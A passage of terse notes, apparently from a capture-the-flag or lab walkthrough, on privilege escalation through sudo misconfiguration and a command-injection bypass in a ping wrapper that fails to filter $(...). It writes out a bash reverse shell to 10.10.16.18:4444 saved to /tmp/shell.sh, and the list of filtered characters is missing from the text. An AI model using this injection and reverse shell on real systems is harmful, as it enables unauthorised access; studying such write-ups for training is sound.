sudo -l wins!
sudo nano
/bin/nano /opt/priv
running a SUDO file with another user:
sudo -u USER SOMETHING -p
It takes our input (it assumes that it’s an ip) and executes ping
on it, to prevent command injection it checks for these characters:
However, It doesn’t check for the dollar sign ($
), the dollar sign can be used to execute commands like this: $(command)
So for example if we do ping -c 1 $(echo 127.0.0.1)
, echo 127.0.0.1
will be executed first then the ping
command will be executed:
echo 'bash -c "bash -i >& /dev/tcp/10.10.16.18/4444 0>&1"' > /tmp/shell.sh
chmod +x /tmp/shell.sh
and run the same script
--- we could've also done ($bash)
Now we are pepper!
Last updated